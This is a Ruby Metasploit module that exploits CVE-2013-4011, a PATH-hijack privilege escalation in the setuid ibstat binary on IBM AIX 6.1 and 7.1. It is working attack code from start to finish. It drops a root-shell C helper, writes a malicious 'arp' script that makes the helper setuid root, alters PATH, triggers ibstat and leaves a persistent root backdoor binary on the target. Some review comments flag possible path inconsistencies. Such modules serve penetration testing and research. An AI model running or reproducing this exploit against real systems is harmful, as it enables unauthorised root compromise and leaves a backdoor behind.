# TODO: verify that these require lines are the correct dependencies for this module
require 'msf/core'
require 'rex'
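# Local privilege escalation for IBM AIX 6.1/7.1 through the SUID binary
# ibstat (CVE-2013-4011). Every action runs on the existing session via
# cmd_exec; the module does no local file or network I/O of its own.
#
# Artifacts this module creates on the target, all under WritableDir:
#   * <root_file>.c - dropped only when gcc is found; deleted after compiling
#   * <root_file>   - the compiled helper, or a copy of /bin/sh; the arp
#                     script makes it setuid root and nothing removes it
#   * arp           - the helper shell script; removed after ibstat runs
class Metasploit4 < Msf::Exploit::Local
  Rank = ExcellentRanking

  # Registers module metadata and the single WritableDir option.
  #
  # @param info [Hash] metadata merged via update_info
  def initialize(info = {})
    super(update_info(info, {
      'Name' => 'ibstat $PATH Privilege Escalation',
      'Description' => %q{
        This module exploits the trusted PATH environment variable of the SUID binary 'ibstat'.
      },
      'Author' =>
        [
          'Kristian Erik Hermansen', # original author
          'Sagi Shahar (sagi-) <sagi.shahar[at]mwrinfosecurity.com>', # msf module
          'Kostas Lintovois <kostas.lintovois[at]mwrinfosecurity.com>', # msf module
        ],
      'References' =>
        [
          [ 'CVE', '2013-4011' ],
          [ 'OSVDB', '95420' ],
          [ 'BID', '61287' ],
          [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=isg1IV43827' ],
          [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=isg1IV43756' ]
        ],
      'Platform' => [ 'aix' ],
      'Arch' => [ 'ppc' ],
      'Targets' =>
        [
          [
            'IBM AIX Version 6.1',
            {
              'Arch' => 'ppc',
              'Platform' => 'aix',
              'AIX' => '6.1',
            }
          ],
          [
            'IBM AIX Version 7.1',
            {
              'Arch' => 'ppc',
              'Platform' => 'aix',
              'AIX' => '7.1',
            }
          ],
        ],
      'DefaultTarget' => 1,
    }))

    register_options([
      OptString.new("WritableDir", [ true, "A directory where we can write files", "." ]),
    ], self.class)
  end

  # Runs the whole chain in order: vulnerability check, helper binary,
  # arp script, PATH change, ibstat trigger, arp-script cleanup, root check.
  # Returns early, touching nothing on the target, when is_vuln is false.
  #
  # @return [nil]
  def exploit
    return unless is_vuln

    root_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}"
    arp_file = "#{datastore["WritableDir"]}/arp"

    if is_gcc_installed
      write_c_file(root_file)
      print_status("Compiling source...")
      cmd_exec "gcc -o #{root_file} #{root_file}.c"
      print_status("Compilation completed")
      print_status("Deleting source...")
      cmd_exec "rm #{root_file}.c"
    else
      # No compiler on the box: the helper is a plain copy of /bin/sh.
      cmd_exec "cp /bin/sh #{root_file}"
    end

    print_status("Writing custom arp file...")
    write_arp_file(arp_file, root_file)
    print_status("Custom arp file written")

    # NOTE(review): the arp script is written to WritableDir, but PATH is
    # prefixed with "." — the two only coincide when WritableDir is the
    # session's current directory (the default ".") — confirm.
    # Also assumes consecutive cmd_exec calls share one shell, so the
    # exported PATH is still in effect for the ibstat call — TODO confirm.
    print_status("Updating PATH environment variable...")
    cmd_exec 'PATH=.:$PATH'
    cmd_exec 'export PATH'

    # NOTE(review): is_vuln inspects /usr/sbin/ibstat while this runs
    # /usr/bin/ibstat — confirm which path is intended.
    print_status("Triggering vulnerability...")
    cmd_exec '/usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null'

    print_status("Removing custom arp...")
    cmd_exec "rm #{arp_file}"

    # root_file is not removed here; it stays in WritableDir afterwards.
    print_status("Checking root privileges...")
    verify_root(root_file)
  end

  # Looks for a line containing "gcc version" in the output of `gcc -v`.
  #
  # @return [Boolean] true when such a line is found, false otherwise
  def is_gcc_installed
    print_status("Checking if gcc exists...")
    gcc_version = cmd_exec 'gcc -v'
    found = gcc_version.split("\n").find { |res| res.include?("gcc version") }
    if found
      print_good("gcc found! (#{found})")
      return true
    end
    print_status("gcc not found. Using /bin/sh from local system")
    false
  end

  # Drops the helper C source as `<filename>.c` on the target, one echo
  # per line (the first truncates, the rest append).
  #
  # @param filename [String] path of the binary the source will compile to
  def write_c_file(filename)
    c_file = "#{filename}.c"
    print_status("Dropping file #{c_file}...")
    source_lines = [
      "#include <stdio.h>\n",
      "int main()",
      "{",
      "setreuid(0,0);",
      "setregid(0,0);",
      "execve(\\\"/bin/sh\\\",NULL,NULL);",
      "return 0;",
      "}",
    ]
    source_lines.each_with_index do |line, idx|
      redirect = idx.zero? ? '>' : '>>'
      cmd_exec "echo \"#{line}\" #{redirect} #{c_file}"
    end
  end

  # Writes the `arp` helper script that ibstat resolves through PATH: it
  # chowns bin_file to root and sets mode 4555 on it. The script itself
  # is left mode 0555.
  #
  # @param arp_file [String] path of the script to create
  # @param bin_file [String] path of the helper binary the script modifies
  def write_arp_file(arp_file, bin_file)
    cmd_exec "echo \"#!/bin/sh\" > #{arp_file}"
    cmd_exec "echo \"chown root #{bin_file}\" >> #{arp_file}"
    cmd_exec "echo \"chmod 4555 #{bin_file}\" >> #{arp_file}"
    cmd_exec "chmod 0555 #{arp_file}"
  end

  # Executes the helper and reports whether `id` now shows uid/euid 0.
  # The euid check comes first because "euid=0(root)" also contains
  # "uid=0(root)".
  #
  # @param filename [String] path of the helper binary to run
  def verify_root(filename)
    cmd_exec filename
    id_output = cmd_exec "id"
    if id_output.include?("euid=0(root)")
      print_good("Got root! (euid)")
    elsif id_output.include?("uid=0(root)")
      print_good("Got root!")
    else
      print_status("Exploit failed")
    end
  end

  # Treats the target as vulnerable only when `ls -l /usr/sbin/ibstat`
  # shows the exact mode string "-r-sr-xr-x" (setuid, mode 4555); any
  # other output is reported as not vulnerable.
  #
  # @return [Boolean]
  def is_vuln
    ls_output = cmd_exec "ls -l /usr/sbin/ibstat"
    if ls_output.include?("-r-sr-xr-x")
      print_good("Target is vulnerable")
      true
    else
      print_status("Target is not vulnerable")
      false
    end
  end
end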